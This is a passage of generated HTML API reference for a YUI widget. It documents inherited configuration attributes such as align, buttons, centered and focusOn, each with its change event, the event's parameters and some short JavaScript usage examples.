<div class="emits box">
<h4>Fires event <code>alignChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>align</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div class="example">
<h4>Example:</h4>
<div class="example-content">
<p>Aligns the top-right corner of the widget with the top-left corner
of the viewport:</p>
<pre class="code"><code class="prettyprint">myWidget.set('align', {
points: [Y.WidgetPositionAlign.TR, Y.WidgetPositionAlign.TL]
});
</code></pre>
</div>
</div>
</div>
<div id="attr_alignOn" class="attr item inherited">
<a name="config_alignOn"></a>
<h3 class="name"><code>alignOn</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#attr_alignOn">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l97"><code>widget-position-align/js/Widget-PositionAlign.js:97</code></a>
</p>
</div>
<div class="description">
<p>An Array of Objects corresponding to the <code>Node</code>s and events that will cause
the alignment of this widget to be synced to the DOM.</p>
<p>The <code>alignOn</code> Attribute is expected to be an Array of Objects with the
following properties:</p>
<ul>
<li><p><strong><code>eventName</code></strong>: The String event name to listen for.</p></li>
<li><p><strong><code>node</code></strong>: The optional <code>Node</code> that will fire the event, it can be a
<code>Node</code> reference or a selector String. This will default to the widget's
<code>boundingBox</code>.</p></li>
</ul>
</div>
<p><strong>Default:</strong> []</p>
<div class="emits box">
<h4>Fires event <code>alignOnChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>alignOn</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div class="example">
<h4>Example:</h4>
<div class="example-content">
<p>Sync this widget's alignment on window resize:</p>
<pre class="code"><code class="prettyprint">myWidget.set('alignOn', [
{
node : Y.one('win'),
eventName: 'resize'
}
]);
</code></pre>
</div>
</div>
</div>
<div id="attr_bodyContent" class="attr item inherited">
<a name="config_bodyContent"></a>
<h3 class="name"><code>bodyContent</code></h3>
<span class="type">HTML</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#attr_bodyContent">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l171"><code>widget-stdmod/js/Widget-StdMod.js:171</code></a>
</p>
</div>
<div class="description">
<p>The content to be added to the body section. This will replace any existing content
in the body. If you want to append, or insert new content, use the <a href="#method_setStdModContent">setStdModContent</a> method.</p>
</div>
<p><strong>Default:</strong> undefined</p>
<div class="emits box">
<h4>Fires event <code>bodyContentChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>bodyContent</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_boundingBox" class="attr item inherited">
<a name="config_boundingBox"></a>
<h3 class="name"><code>boundingBox</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_boundingBox">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l175"><code>widget/js/Widget.js:175</code></a>
</p>
</div>
<div class="description">
<p>The outermost DOM node for the Widget, used for sizing and positioning
of a Widget as well as a containing element for any decorator elements used
for skinning.</p>
</div>
<div class="emits box">
<h4>Fires event <code>boundingBoxChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>boundingBox</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_buttons" class="attr item inherited">
<a name="config_buttons"></a>
<h3 class="name"><code>buttons</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#attr_buttons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l55"><code>widget-buttons/js/widget-buttons.js:55</code></a>
</p>
<p>Available since 3.4.0</p>
</div>
<div class="description">
<p>Collection containing a widget's buttons.</p>
<p>The collection is an Object which contains an Array of <code>Y.Node</code>s for every
<code>WidgetStdMod</code> section (header, body, footer) which has one or more buttons.
All button nodes have the <code>Y.Plugin.Button</code> plugin applied.</p>
<p>This attribute is very flexible in the values it will accept. <code>buttons</code> can
be specified as a single Array, or an Object of Arrays keyed to a particular
section.</p>
<p>All specified values will be normalized to this type of structure:</p>
<pre class="code"><code class="prettyprint">{
header: [...],
footer: [...]
}
</code></pre>
<p>A button can be specified as a <code>Y.Node</code>, config Object, or String name for a
predefined button on the <code>BUTTONS</code> prototype property. When a config Object
is provided, it will be merged with any defaults provided by a button with
the same <code>name</code> defined on the <code>BUTTONS</code> property.</p>
<p>See <code>addButton()</code> for the detailed list of configuration properties.</p>
<p>For convenience, a widget's buttons will always persist and remain rendered
after header/body/footer content updates. Buttons should be removed by
updating this attribute or using the <code>removeButton()</code> method.</p>
</div>
<p><strong>Default:</strong> {}</p>
<div class="emits box">
<h4>Fires event <code>buttonsChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>buttons</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div class="example">
<h4>Example:</h4>
<div class="example-content">
<pre class="code"><code class="prettyprint">{
// Uses predefined "close" button by string name.
header: ['close'],
footer: [
{
name : 'cancel',
label : 'Cancel',
action: 'hide'
},
{
name : 'okay',
label : 'Okay',
isDefault: true,
events: {
click: function (e) {
this.hide();
}
}
}
]
}
</code></pre>
</div>
</div>
</div>
<div id="attr_centered" class="attr item inherited">
<a name="config_centered"></a>
<h3 class="name"><code>centered</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#attr_centered">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l79"><code>widget-position-align/js/Widget-PositionAlign.js:79</code></a>
</p>
</div>
<div class="description">
<p>A convenience Attribute, which can be used as a shortcut for the <code>align</code>
Attribute.</p>
<p>If set to <code>true</code>, the widget is centered in the viewport. If set to a <code>Node</code>
reference or valid selector String, the widget will be centered within the
<code>Node</code>. If set to <code>false</code>, no center positioning is applied.</p>
</div>
<p><strong>Default:</strong> false</p>
<div class="emits box">
<h4>Fires event <code>centeredChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>centered</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_constrain" class="attr item inherited">
<a name="config_constrain"></a>
<h3 class="name"><code>constrain</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#attr_constrain">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l56"><code>widget-position-constrain/js/Widget-PositionConstrain.js:56</code></a>
</p>
</div>
<div class="description">
<p>The node to constrain the widget's bounding box to, when setting xy. Can also be
set to true, to constrain to the viewport.</p>
</div>
<p><strong>Default:</strong> null</p>
<div class="emits box">
<h4>Fires event <code>constrainChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>constrain</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_contentBox" class="attr item inherited">
<a name="config_contentBox"></a>
<h3 class="name"><code>contentBox</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_contentBox">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l189"><code>widget/js/Widget.js:189</code></a>
</p>
</div>
<div class="description">
<p>A DOM node that is a direct descendant of a Widget's bounding box that
houses its content.</p>
</div>
<div class="emits box">
<h4>Fires event <code>contentBoxChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>contentBox</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_defaultButton" class="attr item inherited">
<a name="config_defaultButton"></a>
<h3 class="name"><code>defaultButton</code></h3>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<span class="flag readonly">readonly</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#attr_defaultButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l121"><code>widget-buttons/js/widget-buttons.js:121</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>The current default button as configured through this widget's <code>buttons</code>.</p>
<p>A button can be configured as the default button in the following ways:</p>
<ul>
<li><p>As a config Object with an <code>isDefault</code> property:
<code>{label: 'Okay', isDefault: true}</code>.</p></li>
<li><p>As a Node with a <code>data-default</code> attribute:
<code><button data-default="true">Okay</button></code>.</p></li>
</ul>
<p>This attribute is <strong>read-only</strong>; anytime there are changes to this widget's
<code>buttons</code>, the <code>defaultButton</code> will be updated if needed.</p>
<p><strong>Note:</strong> If two or more buttons are configured to be the default button,
the last one wins.</p>
</div>
<p><strong>Default:</strong> null</p>
<div class="emits box">
<h4>Fires event <code>defaultButtonChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>defaultButton</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_destroyed" class="attr item inherited">
<a name="config_destroyed"></a>
<h3 class="name"><code>destroyed</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<span class="flag readonly">readonly</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#attr_destroyed">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l158"><code>base/js/BaseCore.js:158</code></a>
</p>
</div>
<div class="description">
<p>Flag indicating whether or not this object
has been through the destroy lifecycle phase.</p>
</div>
<p><strong>Default:</strong> false</p>
<div class="emits box">
<h4>Fires event <code>destroyedChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>destroyed</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_disabled" class="attr item inherited">
<a name="config_disabled"></a>
<h3 class="name"><code>disabled</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_disabled">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l231"><code>widget/js/Widget.js:231</code></a>
</p>
</div>
<div class="description">
<p>Boolean indicating if the Widget should be disabled. The disabled implementation
is left to the specific classes extending widget.</p>
</div>
<p><strong>Default:</strong> false</p>
<div class="emits box">
<h4>Fires event <code>disabledChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>disabled</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_fillHeight" class="attr item inherited">
<a name="config_fillHeight"></a>
<h3 class="name"><code>fillHeight</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#attr_fillHeight">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l182"><code>widget-stdmod/js/Widget-StdMod.js:182</code></a>
</p>
</div>
<div class="description">
<p>The section (WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER) which should be resized to fill the height of the standard module, when a
height is set on the Widget. If a height is not set on the widget, then all sections are sized based on
their content.</p>
</div>
<p><strong>Default:</strong> WidgetStdMod.BODY</p>
<div class="emits box">
<h4>Fires event <code>fillHeightChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>fillHeight</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_focused" class="attr item inherited">
<a name="config_focused"></a>
<h3 class="name"><code>focused</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<span class="flag readonly">readonly</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_focused">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l218"><code>widget/js/Widget.js:218</code></a>
</p>
</div>
<div class="description">
<p>Boolean indicating if the Widget, or one of its descendants,
has focus.</p>
</div>
<p><strong>Default:</strong> false</p>
<div class="emits box">
<h4>Fires event <code>focusedChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>focused</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_focusOn" class="attr item inherited">
<a name="config_focusOn"></a>
<h3 class="name"><code>focusOn</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#attr_focusOn">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l96"><code>widget-modality/js/Widget-Modality.js:96</code></a>
</p>
</div>
<div class="description">
<p>An array of objects corresponding to the nodes and events that will trigger a re-focus back on the widget.
The implementer can supply an array of objects, with each object having the following properties:</p>
<p>eventName: (string, required): The eventName to listen to.</p>
<p>node: (Y.Node, optional): The Y.Node that will fire the event (defaults to the boundingBox of the widget)</p>
<p>By default, this attribute consists of two objects which will cause the widget to re-focus if anything
outside the widget is clicked on or focussed upon.</p>
</div>
<div class="emits box">
<h4>Fires event <code>focusOnChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>focusOn</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
